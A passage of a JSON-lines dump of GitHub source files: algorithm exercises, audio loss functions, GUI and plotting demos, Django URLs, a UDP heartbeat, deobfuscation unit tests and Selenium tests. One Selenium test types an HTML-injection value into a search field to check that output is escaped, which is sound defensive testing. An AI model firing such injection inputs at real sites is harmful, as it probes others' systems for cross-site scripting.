continue\n visited_BFS[target_node] = True\n visited_BFS_seq.append(target_node)\n for next_node in sorted(edge_list[target_node]):\n if visited_BFS[next_node] is False:\n queue_BFS.append(next_node)\n\n print(*visited_DFS_seq)\n print(*visited_BFS_seq)\n\n\nif __name__ == \"__main__\":\n solution()","repo_name":"SWARTHYPEARL/Algorithm_Study","sub_path":"baekjoon/baekjoon_1260.py","file_name":"baekjoon_1260.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1059154004","text":"#PROBLEM LINK:- https://leetcode.com/problems/kids-with-the-greatest-number-of-candies/\n\nclass Solution:\n def kidsWithCandies(self, c, e):\n result = []\n for i in range(len(c)):\n if c[i]+e>=max(c):\n result.append(True)\n else:\n result.append(False)\n return result\n","repo_name":"hassanrahim26/LEETCODE","sub_path":"ARRAYS/Easy/Kids With the Greatest Number of Candies/Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"35264981495","text":"import torch\n\nfrom clarity.predictor.torch_stoi import NegSTOILoss\n\n\nclass SISNRLoss(torch.nn.Module):\n # def __init__(self): # removed as does nothing\n # super(SISNRLoss, self).__init__()\n\n def cal_sisnr(self, x, s, eps=1e-8):\n \"\"\"\n Arguments:\n x: separated signal, N x S tensor\n s: reference signal, N x S tensor\n Return:\n sisnr: N tensor\n \"\"\"\n\n def l2norm(mat, keepdim=False):\n return torch.norm(mat, dim=-1, keepdim=keepdim)\n\n if x.shape != s.shape:\n raise RuntimeError(\n f\"Dimension mismatch when calculate si-snr, {x.shape} vs {s.shape}\"\n )\n x_zm = x - torch.mean(x, dim=-1, keepdim=True)\n s_zm = s - torch.mean(s, dim=-1, keepdim=True)\n t = (\n torch.sum(x_zm * s_zm, dim=-1, keepdim=True)\n * s_zm\n / (l2norm(s_zm, keepdim=True) ** 2 + eps)\n )\n return 20 * torch.log10(eps + l2norm(t) / (l2norm(x_zm - t) + eps))\n\n def forward(self, x, y):\n return -self.cal_sisnr(x, y).mean()\n\n\nclass SNRLoss(torch.nn.Module):\n def __init__(self, tao=1e-3):\n super().__init__()\n self.tao = tao\n\n def l2norm(self, mat, keepdim=False):\n return torch.norm(mat, dim=-1, keepdim=keepdim)\n\n def forward(self, x, s, eps=1e-8):\n if x.shape != s.shape:\n raise RuntimeError(\n f\"Dimension mismatch when calculate si-snr, {x.shape} vs {s.shape}\"\n )\n\n loss = 10 * torch.log10(\n self.l2norm(s - x) ** 2 + self.tao * self.l2norm(s) ** 2 + eps\n ) - 10 * torch.log10(self.l2norm(s) ** 2 + eps)\n return loss.mean()\n\n\nclass STOILoss(torch.nn.Module):\n def __init__(self, sr):\n super().__init__()\n self.NegSTOI = NegSTOILoss(sample_rate=sr)\n\n def forward(self, x, s):\n return self.NegSTOI(x, s).mean()\n\n\nclass STOILevelLoss(torch.nn.Module):\n def __init__(self, sr, alpha, block_size=0.4, overlap=0.7, gamma_a=-70):\n super().__init__()\n self.NegSTOI = NegSTOILoss(sample_rate=sr)\n self.alpha = alpha\n\n \"rms measurement\"\n self.frame_size = int(block_size * sr)\n self.frame_shift = int(block_size * sr * (1 - overlap))\n self.unfold = torch.nn.Unfold(\n (1, self.frame_size), stride=(1, self.frame_shift)\n )\n self.gamma_a = gamma_a\n\n \"mse\"\n self.cal_mse = torch.nn.MSELoss()\n\n def measure_loudness(self, signal, eps=1e-8):\n x_unfold = self.unfold(signal.unsqueeze(1).unsqueeze(2))\n\n z = (\n torch.sum(x_unfold**2, dim=1) / self.frame_size\n ) # mean square for each frame\n el = -0.691 + 10 * torch.log10(z + eps)\n\n 
idx_a = torch.where(el > self.gamma_a, 1, 0)\n z_ave_gated_a = torch.sum(z * idx_a, dim=1, keepdim=True) / (\n torch.sum(idx_a, dim=1, keepdim=True) + eps\n )\n gamma_r = -0.691 + 10 * torch.log10(z_ave_gated_a + eps) - 10\n\n idx_r = torch.where(el > gamma_r, 1, 0)\n idx_a_r = idx_a * idx_r\n z_ave_gated_a_r = torch.sum(z * idx_a_r, dim=1, keepdim=True) / (\n torch.sum(idx_a_r, dim=1, keepdim=True) + eps\n )\n lufs = -0.691 + 10 * torch.log10(z_ave_gated_a_r + eps) # loudness\n return lufs\n\n def forward(self, x, s):\n loudness_x = self.measure_loudness(x)\n loudness_s = self.measure_loudness(s)\n LevelLoss = self.alpha * self.cal_mse(loudness_x, loudness_s)\n return LevelLoss + self.NegSTOI(x, s).mean()\n","repo_name":"claritychallenge/clarity","sub_path":"clarity/engine/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"60"} +{"seq_id":"41301026834","text":"\"\"\"\n Given the coordinates of four points in 2D space, return whether the four points can form a square\n A point's coordinate (x,y) is represented by an integer array of two integers\n example 1:\n Input: p1 = [0,0], p2 = [1,1], p3 = [1,0], p4 = [0,1]\n Output: True\n\"\"\"\nfrom typing import List\n\n\n# A square is defined by four equal sides and equal diagonals\ndef valid_square(p1: List[int], p2: List[int], p3: List[int], p4: List[int]) -> bool:\n pl = [p1, p2, p3, p4]\n dist = []\n for i in range(len(pl)):\n for j in range(i + 1, len(pl)):\n item = (pl[i][1] - pl[j][1]) ** 2 + (pl[i][0] - pl[j][0]) ** 2\n dist.append(item)\n dist.sort()\n return True if dist[0] == dist[3] != 0 and dist[4] == dist[5] else False\n\n\nif __name__ == '__main__':\n print(valid_square(p1=[0, 0], p2=[1, 1], p3=[1, 0], p4=[0, 1]))\n\n","repo_name":"zexiangzhang/algorithmAndDataStructure","sub_path":"algorithm/computational_geometry/base/valid_square.py","file_name":"valid_square.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"34188206772","text":"# The shooting section coach received the results\n# of his athletes' performances, where each score means\n# a hit sector.\n# Help him simulate the hit targets\n# from the available data.\n# Nikolay: 4, 6, 10, 4, 2, 8, 10, 7, 1, 5\n# Alexander: 3, 3, 10, 5, 10, 10, 4, 3, 6, 1\n# Pavel: 2, 2, 1, 1, 3, 7, 9, 9, 2, 8\n\nimport matplotlib.pyplot as plt\n\nn = [4, 6, 10, 4, 2, 8, 10, 7, 1, 5]\na = [3, 3, 10, 5, 10, 10, 4, 3, 6, 1]\np = [2, 2, 1, 1, 3, 7, 9, 9, 2, 8]\n\nmax_value = 10\n\nn_invert = list(max_value - i for i in n)\na_invert = list(max_value - i for i in a)\np_invert = list(max_value - i for i in p)\n\nax = plt.subplot(131, polar = True)\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_ticks([0, 2, 4, 6, 8, 10])\nax.get_yaxis().set_ticklabels(['10', '8', '6', '4', '2', '0'])\nplt.plot(n_invert, 'ro')\n\nax = plt.subplot(132, projection = 'polar')\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_ticks([0, 2, 4, 6, 8, 10])\nax.get_yaxis().set_ticklabels(['10', '8', '6', '4', '2', '0'])\nplt.plot(a_invert, 'go')\n\nax = plt.subplot(133, projection = 'polar')\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_ticks([0, 2, 4, 6, 8, 10])\nax.get_yaxis().set_ticklabels(['10', '8', '6', '4', '2', '0'])\nplt.plot(p_invert, 'yo')\n\nplt.show()","repo_name":"fillomaniya/Python_education","sub_path":"seminar_11/seminarWork/zadacha2.py","file_name":"zadacha2.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"14227492247","text":"import tkinter as tk\r\nimport tkinter.ttk as ttk\r\n\r\nclass Window:\r\n def __init__(self,master):\r\n\r\n style = ttk.Style()\r\n style.theme_create(\"Custom\")\r\n style.theme_settings(\"Custom\", {\r\n \"TButton\": {\r\n \"configure\": {\"padding\": 10},\r\n \"map\": {\r\n \"background\": [(\"active\", \"yellow3\"),\r\n (\"!disabled\", \"yellow\")],\r\n \"foreground\": [(\"focus\", \"Red\"),\r\n (\"active\", \"green\"),\r\n (\"!disabled\", \"Blue\")]\r\n }\r\n }\r\n })\r\n\r\n style.theme_use(\"Custom\")\r\n\r\n button = ttk.Button(master, text = \"Uzspied!\")\r\n button.pack(padx = 5, pady = 5)\r\n \r\n \r\n label = ttk.Label(master, text = \"Es esmu Label\")\r\n label.pack(padx = 5, pady = 5)\r\n\r\nroot = tk.Tk()\r\nroot.geometry('200x220')\r\nwindow = Window(root)\r\nroot.mainloop()","repo_name":"Ralfs1/Klases-darbi","sub_path":"Klases darbi/6 aprilis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35491049162","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nfrom api.custom_admin import custom_admin_site, custom_admin_urls\n\nfrom api.urls import lesson_urls, project_urls, classroom_urls, user_urls, invites_urls, auth_urls\nfrom api.views import ApiRoot, BlogView\n\n\napi_patterns = patterns('',\n\n url(r'^$', ApiRoot.as_view(), name='root'),\n url(r'^blog/', BlogView.as_view(), name='blog'),\n\n url(r'^lessons', include(lesson_urls)),\n url(r'^projects', include(project_urls)),\n url(r'^classrooms', include(classroom_urls)),\n url(r'^users', include(user_urls)),\n url(r'^invites', include(invites_urls)),\n\n url(r'^auth', include(auth_urls)),\n\n url(r'^mkp', include('marketplace.urls')),\n\n url(r'^playlists', include('playlists.urls')),\n\n url(r'^projects', include('analytics.urls')),\n\n url(r'^docs/', include('rest_framework_swagger.urls')),\n)\n\nurlpatterns = patterns('',\n\n url(r'^api/v1/', include(api_patterns, namespace='api')),\n\n url(r'instructables-proxy/$', 'utils_app.views.instructables_proxy_view', name='instructables-proxy'),\n\n url(r'^admin/', include(admin.site.urls)),\n (r'^grappelli/', include('grappelli.urls')),\n\n url(r'^select2/', include('django_select2.urls')),\n\n url(r'^apiauth/', include('rest_framework_authtoken_cookie.urls', namespace='rest_framework_authtoken_cookie')),\n\n url(r'^xdomain/', include('xdomain.urls', namespace='xdomain')),\n\n #custom admin views:\n url(r'^admin/custom', include(custom_admin_urls, namespace=custom_admin_site.name)),\n # Direct link for editing the homepage Projects' ids. 
Data migration ensures it has id=1\n url(r'^admin/playlists/playlist/%d/' % ApiRoot.get_homepage_playlist_id(),\n RedirectView.as_view(url='/admin/playlists/playlist/%d/' % ApiRoot.get_homepage_playlist_id(),\n permanent=True), name='edit-homepage-ids'),\n)\n","repo_name":"omni360/inspiration-edu-api","sub_path":"eduapi/eduapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11772926356","text":"import socket\r\nimport multiprocessing\r\nimport time\r\n\r\n\r\ndef heartbeat(host, port, beat_period):\r\n \r\n ADDR = (host,port)\r\n \r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n \r\n thStop = False\r\n \r\n while not thStop:\r\n \r\n # UDP payloads must be bytes in Python 3\r\n sock.sendto(b'PyHB', ADDR)\r\n \r\n time.sleep(beat_period)\r\n","repo_name":"lanninghuanxue/learngit","sub_path":"send/heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30604301106","text":"from contextlib import ExitStack\nfrom textwrap import dedent\nfrom unittest.mock import patch\n\nfrom expects import *\n\nfrom analysis.block import (\n Block, block_simplify, sa_common_subexpr, sa_const_fold, sa_copy_propagate, sa_dead_code_elim, sa_expr_simp,\n sa_mem_elim, sa_sub_assign_retrieve, sa_to_ssa, ssa_to_sa\n)\nfrom analysis.specs._stub import *\nfrom analysis.specs._utils import to_blocks\n\nwith description('Block'):\n with description('__str__'):\n with it('converts to str'):\n block = Block(instrs=[\n ('eax', '=', 1),\n ('eax', '=', '!', 1),\n ('eax', '=', '+', 'ebx', 1),\n ])\n block.call = ('somelib', 'somemethod')\n block.condition = 'tmp_0'\n expect(str(block)).to(equal(dedent('''\n eax = 0x1\n eax = ! 
0x1\n eax = ebx + 0x1\n jmp to somelib!somemethod\n jmp left if tmp_0\n ''').strip()))\n\n with it('raises ValueError on unknown op arity'):\n expect(lambda: str(Block(instrs=[\n ('eax', '=', '??', 1, 1, 1),\n ]))).to(raise_error(ValueError))\n\n with description('split'):\n with it('splits block'):\n blocks = to_blocks([\n {'children': (2,)},\n {'children': (2,)},\n {'addr_sizes': {(0, 4)}, 'instrs': [\n ('eax', '=', 1), ('eax', '=', 2)\n ], 'condition': 'tmp', 'children': (3, 4)},\n {'children': ()},\n {'children': ()},\n ])\n upper_half, lower_half = blocks[2], blocks[2].split(1)\n expect(blocks[0].children).to(equal((upper_half,)))\n expect(blocks[1].children).to(equal((upper_half,)))\n expect(upper_half.addr_sizes).to(equal({(0, 4)}))\n expect(upper_half.instrs).to(equal([('eax', '=', 1)]))\n expect(upper_half.parents).to(equal({blocks[0], blocks[1]}))\n expect(upper_half.children).to(equal(()))\n expect(lower_half.addr_sizes).to(equal({(0, 4)}))\n expect(lower_half.instrs).to(equal([('eax', '=', 2)]))\n expect(lower_half.parents).to(equal(set()))\n expect(lower_half.condition).to(equal('tmp'))\n expect(lower_half.children).to(equal((blocks[3], blocks[4])))\n\n with it('splits addr_sizes'):\n blocks = to_blocks([{'addr_sizes': {(0, 4), (4, 4)}, 'instrs': []}])\n upper_half, lower_half = blocks[0], blocks[0].split(0, 4)\n expect(upper_half.addr_sizes).to(equal({(0, 4)}))\n expect(lower_half.addr_sizes).to(equal({(4, 4)}))\n\n with it('merges blocks no matter how many children the block has'):\n blocks = to_blocks([\n {'children': (2,)},\n {'children': (2,)},\n {'addr_sizes': {(0, 4)}, 'instrs': [('eax', '=', 1)], 'condition': 'tmp_1', 'children': (3, 4)},\n {'addr_sizes': {(4, 4)}, 'instrs': [('eax', '=', 2)], 'condition': 'tmp_2', 'children': (5, 6)},\n {'children': ()},\n {'children': ()},\n {'children': ()},\n ])\n upper_half, lower_half = blocks[2], blocks[3]\n upper_half.merge(lower_half)\n expect(blocks[0].children).to(equal((upper_half,)))\n expect(blocks[1].children).to(equal((upper_half,)))\n expect(upper_half.addr_sizes).to(equal({(0, 4), (4, 4)}))\n expect(upper_half.instrs).to(equal([('eax', '=', 1), ('eax', '=', 2)]))\n expect(upper_half.condition).to(equal('tmp_2'))\n expect(upper_half.parents).to(equal({blocks[0], blocks[1]}))\n expect(upper_half.children).to(equal((blocks[5], blocks[6])))\n expect(lower_half.parents).to(equal(set()))\n expect(lower_half.children).to(equal(()))\n expect(blocks[4].parents).to(equal(set()))\n\n with description('children.setter'):\n with it('only allows setting with tuples'):\n expect(lambda: setattr(Block(), 'children', [Block(), Block()])).to(raise_error(ValueError))\n\n with it('updates children & parents after setting children'):\n blocks = [Block(), Block(), Block(), Block(), Block()]\n blocks[0].children = (blocks[1], blocks[2])\n expect(blocks[0].children).to(equal((blocks[1], blocks[2])))\n expect(blocks[1].parents).to(equal({blocks[0]}))\n expect(blocks[2].parents).to(equal({blocks[0]}))\n blocks[0].children = (blocks[3], blocks[4])\n expect(blocks[0].children).to(equal((blocks[3], blocks[4])))\n expect(blocks[1].parents).to(equal(set()))\n expect(blocks[2].parents).to(equal(set()))\n expect(blocks[3].parents).to(equal({blocks[0]}))\n expect(blocks[4].parents).to(equal({blocks[0]}))\n\n\nwith description('sa_to_ssa'):\n with it('changes to ssa form'):\n expect(sa_to_ssa([\n ('eax', '=', '+', 'eax', 'ecx'),\n ('ebx', '=', 'eax'),\n ('eax', '=', 'ebx'),\n ])).to(equal(([\n ('eax_1', '=', '+', 'eax_0', 'ecx_0'),\n ('ebx_1', '=', 
'eax_1'),\n ('eax_2', '=', 'ebx_1'),\n ], {'eax': 'eax_2', 'ebx': 'ebx_1', 'ecx': 'ecx_0'})))\n\n with it('works with subwords'):\n expect(sa_to_ssa([\n ('al', 'x=', 'eax'),\n ])).to(equal(([\n ('al_1', 'x=', 'eax_0'),\n ], {'al': 'al_1', 'eax': 'eax_0'})))\n\n with it('recounts all names'):\n expect(sa_to_ssa([\n ('tmp_3', '=', 'tmp_2'),\n ('tmp', '=', 'tmp_3'),\n ])).to(equal(([\n ('tmp_1', '=', 'tmp_0'),\n ('tmp_2', '=', 'tmp_1'),\n ], {'tmp': 'tmp_2', 'tmp_2': 'tmp_0', 'tmp_3': 'tmp_1'})))\n\nwith description('ssa_to_sa'):\n with it('recounts & remove counters from initial & final registers'):\n expect(ssa_to_sa([\n ('eax_2', '=', '+', 'eax_1', 'ecx_1'),\n ('ebx_1', '[]=', 'eax_2'),\n ('ebx_2', '=', 'eax_2'),\n ('eax_3', '=', 'ebx_2'),\n ])).to(equal(([\n ('eax_1', '=', '+', 'eax', 'ecx'),\n ('ebx', '[]=', 'eax_1'),\n ('ebx', '=', 'eax_1'),\n ('eax', '=', 'ebx'),\n ], {'eax_1': 'eax', 'eax_2': 'eax_1', 'eax_3': 'eax', 'ebx_1': 'ebx', 'ebx_2': 'ebx', 'ecx_1': 'ecx'})))\n\n with it('ignores registers which are not modified'):\n expect(ssa_to_sa([\n ('eax_1', '=', 'eax_0'),\n ])[0]).to(equal(([])))\n\nwith description('sa_expr_simp'):\n with it('simplifies xor same register to 0'):\n expect(sa_expr_simp([\n ('r2', '=', '^', 'r1', 'r1'),\n ])).to(equal([\n ('r2', '=', 0),\n ]))\n\n with it('simplify expressions involving `r1 ^ r2`'):\n expect(sa_expr_simp([\n ('r3', '=', '^', 'r1', 'r2'),\n ('r4', '=', '^', 'r3', 'r1'),\n ])).to(equal([\n ('r3', '=', '^', 'r1', 'r2'),\n ('r4', '=', 'r2'),\n ]))\n\n with it('simplify expressions involving `r1 - r1`'):\n expect(sa_expr_simp([\n ('r2', '=', '-', 'r1', 'r1'),\n ])).to(equal([\n ('r2', '=', 0),\n ]))\n\n with it('simplify expressions involving `r1 + 1`, `r1 - 1`'):\n expect(sa_expr_simp([\n ('r2', '=', '+', 'r1', 1),\n ('r3', '=', '+', 'r2', 1),\n ('r4', '=', '-', 'r3', 3),\n ('r5', '=', '+', 'r4', 1),\n ])).to(equal([\n ('r2', '=', '+', 'r1', 1),\n ('r3', '=', '+', 'r1', 2),\n ('r4', '=', '-', 'r1', 1),\n ('r5', '=', 'r1'),\n ]))\n\nwith description('sa_mem_elim'):\n with description('read'):\n with it('simplifies for constant addresses'):\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n (4, '[4]=', 2),\n ('r1', '=[4]', 0),\n ('r2', '=[4]', 4),\n ])).to(equal([\n (0, '[4]=', 1),\n (4, '[4]=', 2),\n ('r1', '=', 1),\n ('r2', '=', 2),\n ]))\n\n with it('simplifies for register + constant'):\n expect(sa_mem_elim([\n ('s2', '=', '+', 's1', 4),\n ('s3', '=', '-', 's1', 4),\n ('s1', '[4]=', 1),\n ('s2', '[4]=', 2),\n ('s3', '[4]=', 3),\n ('r1', '=[4]', 's1'),\n ('r2', '=[4]', 's2'),\n ('r3', '=[4]', 's3'),\n ])).to(equal([\n ('s2', '=', '+', 's1', 4),\n ('s3', '=', '-', 's1', 4),\n ('s1', '[4]=', 1),\n ('s2', '[4]=', 2),\n ('s3', '[4]=', 3),\n ('r1', '=', 1),\n ('r2', '=', 2),\n ('r3', '=', 3),\n ]))\n\n with it('simplifies re-reads even for overlaps'):\n expect(sa_mem_elim([\n ('r1', '=[4]', 0),\n ('r2', '=[4]', 2),\n ('r3', '=[4]', 0),\n ('r4', '=[4]', 2),\n ])).to(equal([\n ('r1', '=[4]', 0),\n ('r2', '=[4]', 2),\n ('r3', '=', 'r1'),\n ('r4', '=', 'r2'),\n ]))\n\n with it('simplifies re-reads after write (regression)'):\n expect(sa_mem_elim([\n ('s1', '[4]=', 0),\n ('r1', '=[4]', 0),\n ('r2', '=[4]', 0),\n ])).to(equal([\n ('s1', '[4]=', 0),\n ('r1', '=[4]', 0),\n ('r2', '=', 'r1'),\n ]))\n\n with it('does not simplify for write in-between with overlap'):\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n (2, '[4]=', 2),\n ('r1', '=[4]', 0),\n ])).to(equal([\n (0, '[4]=', 1),\n (2, '[4]=', 2),\n ('r1', '=[4]', 0),\n ]))\n\n with it('does not simplify for write 
in-between with unknown register'):\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n ('s1', '[4]=', 2),\n ('r1', '=[4]', 0),\n ])).to(equal([\n (0, '[4]=', 1),\n ('s1', '[4]=', 2),\n ('r1', '=[4]', 0),\n ]))\n\n with description('write'):\n with it('removes redundant write even if unrelated value is read in-between'):\n # redundant write if unrelated value is read in-between\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n ('r1', '=[4]', 4),\n (0, '[4]=', 2),\n ])).to(equal([\n ('r1', '=[4]', 4),\n (0, '[4]=', 2),\n ]))\n\n with it('preserves write if overlapped value is read in-between'):\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n ('r1', '=[4]', 2),\n (0, '[4]=', 2),\n ])).to(equal([\n (0, '[4]=', 1),\n ('r1', '=[4]', 2),\n (0, '[4]=', 2),\n ]))\n\n with it('preserves write if unknown memory is read in-between'):\n expect((sa_mem_elim([\n (0, '[4]=', 1),\n ('r1', '=[4]', 's1'),\n (0, '[4]=', 2),\n ]))).to(equal([\n (0, '[4]=', 1),\n ('r1', '=[4]', 's1'),\n (0, '[4]=', 2),\n ]))\n\nwith description('sa_common_subexpr'):\n with it('substitutes common expressions'):\n expect(sa_common_subexpr([\n ('r2', '=', '*', 'r0', 'r1'),\n ('r3', '=', '*', 'r0', 'r1'),\n ])).to(equal([\n ('r2', '=', '*', 'r0', 'r1'),\n ('r3', '=', 'r2'),\n ]))\n\nwith description('sa_copy_propagate'):\n with it('substitutes expressions with their equivalents'):\n expect(sa_copy_propagate([\n ('r1', '=', 'r0'),\n ('r3', '=', '*', 'r1', 'r2'),\n ])).to(equal([\n ('r1', '=', 'r0'),\n ('r3', '=', '*', 'r0', 'r2'),\n ]))\n\n with it('substitutes memory write vars with their equivalents'):\n expect(sa_copy_propagate([\n ('r1', '=', 'r0'),\n ('r1', '[4]=', '*', 'r2', 'r3'),\n ])).to(equal([\n ('r1', '=', 'r0'),\n ('r0', '[4]=', '*', 'r2', 'r3'),\n ]))\n\nwith description('sa_sub_assign_retrieve'):\n with it('replaces sub assign then retrieve with an assign equivalent'):\n expect(sa_sub_assign_retrieve([\n ('r1', 'l=', 'r0'),\n ('r2', '=l', 'r1'),\n ('r4', 'h=', 'r3'),\n ('r5', '=h', 'r4'),\n ('r7', 'x=', 'r6'),\n ('r8', '=x', 'r7'),\n ])).to(equal([\n ('r1', 'l=', 'r0'),\n ('r2', '=', 'r0'),\n ('r4', 'h=', 'r3'),\n ('r5', '=', 'r3'),\n ('r7', 'x=', 'r6'),\n ('r8', '=', 'r6'),\n ]))\n\nwith description('sa_const_fold'):\n with it('folds + and -'):\n expect(sa_const_fold([\n ('r0', '=', '+', 1, 2),\n ('r1', '=', '-', 3, 1),\n ])).to(equal([\n ('r0', '=', 3),\n ('r1', '=', 2),\n ]))\n\nwith description('sa_dead_code_elim'):\n with it('preserves writes to useful vars and any ancestor vars which taint useful vars'):\n expect(sa_dead_code_elim([\n ('r_0', '=', 1),\n ('r_1', '=', 'r_0'),\n ('s_0', '=', 'r_1'),\n ('t_0', '=', 'r_1'),\n ], ['s_0'])).to(equal([\n ('r_0', '=', 1),\n ('r_1', '=', 'r_0'),\n ('s_0', '=', 'r_1'),\n ]))\n\n with it('preserves writes to memory and any ancestor vars which taint any var in the expression'):\n expect(sa_dead_code_elim([\n ('r_0', '=', 1),\n ('r_1', '=', 2),\n ('r_2', '=', 3),\n ('r_2', '[4]=', '+', 'r_0', 'r_1'),\n (0, '[4]=', '+', 'r_0', 'r_1'),\n ('t_0', '=', 'r_1'),\n ], [])).to(equal([\n ('r_0', '=', 1),\n ('r_1', '=', 2),\n ('r_2', '=', 3),\n ('r_2', '[4]=', '+', 'r_0', 'r_1'),\n (0, '[4]=', '+', 'r_0', 'r_1'),\n ]))\n\nwith description('block_simplify'):\n with it('converts to and from ssa form'):\n with patch('analysis.block.sa_to_ssa', side_effect=[([], {})]) as sa_to_ssa_, \\\n patch('analysis.block.ssa_to_sa', side_effect=[([], {})]) as ssa_to_sa_:\n block_simplify(Block())\n expect(sa_to_ssa_.call_count).to(equal(1))\n expect(ssa_to_sa_.call_count).to(equal(1))\n\n with it('repeatedly calls 
simplification routines until the lengths of instructions stay constant'):\n with ExitStack() as stack:\n sa_simps = [stack.enter_context(patch(f'analysis.block.{name}', side_effect=(\n (lambda instrs: instrs) if name != 'sa_dead_code_elim' else\n (lambda instrs, _: instrs[:-1] if len(instrs) > 2 else instrs[::-1])\n ))) for name in [\n 'sa_expr_simp', 'sa_common_subexpr', 'sa_sub_assign_retrieve', 'sa_copy_propagate', 'sa_const_fold',\n 'sa_mem_elim', 'sa_dead_code_elim',\n ]]\n block = Block(instrs=[\n ('eax', '=', 0),\n ('eax', '=', 1),\n ('eax', '=', 2),\n ('eax', '=', 3),\n ])\n block_simplify(block)\n for sa_simp in sa_simps:\n expect(sa_simp.call_count).to(equal(3))\n expect(len(block.instrs)).to(equal(2))\n\n with it('maps block condition'):\n block = Block(instrs=[('tmp_2', '=', 0), ('tmp_3', '=', 1)])\n block.condition = 'tmp_3'\n block_simplify(block)\n expect(block.condition).to(equal('tmp_1'))\n","repo_name":"stevenxxiu/asmdeobf","sub_path":"analysis/specs/block_spec.py","file_name":"block_spec.py","file_ext":"py","file_size_in_byte":15771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74594533310","text":"from typing import TYPE_CHECKING\n\nimport pytest\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom itests.pages.search_results import SearchResultsPage\nfrom itests.pages.users import UserViewPage\nfrom itests.setup import frontend_server\nfrom tests.url_util import url\n\nif TYPE_CHECKING:\n from py._path.local import LocalPath\n from selenium.webdriver import Chrome\n from tests.setup import SetupTest\n\n\ndef test_search(tmpdir, setup, browser):\n # type: (LocalPath, SetupTest, Chrome) -> None\n with setup.transaction():\n setup.create_group(\"group-some\")\n setup.create_permission(\"awesome-permission\")\n setup.create_user(\"some@a.co\")\n\n with frontend_server(tmpdir, \"gary@a.co\") as frontend_url:\n browser.get(url(frontend_url, \"/\"))\n\n page = UserViewPage(browser)\n page.search_input.send_keys(\"some\")\n page.click_search_button()\n\n results_page = SearchResultsPage(browser)\n print(results_page.root.page_source)\n results = [(r.type, r.name) for r in results_page.result_rows]\n assert sorted(results) == [\n (\"Group\", \"group-some\"),\n (\"Permission\", \"awesome-permission\"),\n (\"User\", \"some@a.co\"),\n ]\n\n\ndef test_search_escaping(tmpdir, setup, browser):\n # type: (LocalPath, SetupTest, Chrome) -> None\n with frontend_server(tmpdir, \"gary@a.co\") as frontend_url:\n browser.get(url(frontend_url, \"/\"))\n\n page = UserViewPage(browser)\n page.search_input.send_keys('SEARCH\">foo')\n page.click_search_button()\n\n results_page = SearchResultsPage(browser)\n with pytest.raises(NoSuchElementException):\n results_page.find_element_by_tag_name(\"marquee\")\n","repo_name":"dropbox/merou","sub_path":"itests/fe/search_test.py","file_name":"search_test.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"60"} +{"seq_id":"3343459124","text":"# compute the value of the sum with n terms\n\nN = int(input('Digite o valor de N: '))\n\nnum1 = 37\nnum2 = 38\nsoma = 0\n\nfor den in range(1, N+1):\n soma = ( ( num1 * num2 ) / den ) + soma\n num1 -= 1\n num2 -= 1\n\nprint (f'O valor da soma da série com {N} termos é igual a {soma}')\n\n","repo_name":"luizppbarbosa/UFPE-Introducao-a-Programacao","sub_path":"Arquivos/slide 5 exemplo 
8.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70004104513","text":"import openpyxl\nimport time\n\n\ndef cresce_colunas(lista_colunas):\n tamanho = len(lista_colunas[-1])\n if ord(lista_colunas[-1][-1]) < 90:\n lista_colunas.append(lista_colunas[-1][0:-1] + chr(ord(lista_colunas[-1][-1]) + 1))\n elif tamanho > 1 and ord(lista_colunas[-1][-2]) < 90:\n lista_colunas.append(lista_colunas[-1][0:-2] + chr(ord(lista_colunas[-1][-2]) + 1) + 'A')\n elif tamanho > 2 and ord(lista_colunas[-1][-3]) < 90:\n lista_colunas.append(lista_colunas[-1][0:-3] + chr(ord(lista_colunas[-1][-3]) + 1) + 'AA')\n elif tamanho == 1:\n lista_colunas.append('AA')\n elif tamanho == 2:\n lista_colunas.append('AAA')\n else:\n print('Por favor, contate o suporte')\n return\n return lista_colunas\n\n\ndef descobre_numero(coluna):\n lista_colunas = ['A']\n while lista_colunas[-1] != coluna:\n cresce_colunas(lista_colunas)\n return len(lista_colunas)\n\n\ndef descobre_colunas(quantidade):\n lista_colunas = ['A']\n while len(lista_colunas) < quantidade:\n lista_colunas = cresce_colunas(lista_colunas)\n return lista_colunas\n\n\nprint('Iniciando Programa')\n\nwhile True:\n try:\n planilha1 = input('Digite o nome da planilha mais atual: ')\n planilha1 = openpyxl.load_workbook(filename=planilha1+ '.xlsx')\n aba1 = planilha1.active\n break\n except:\n print('Planilha nao encontrada, favor digitar novamente: 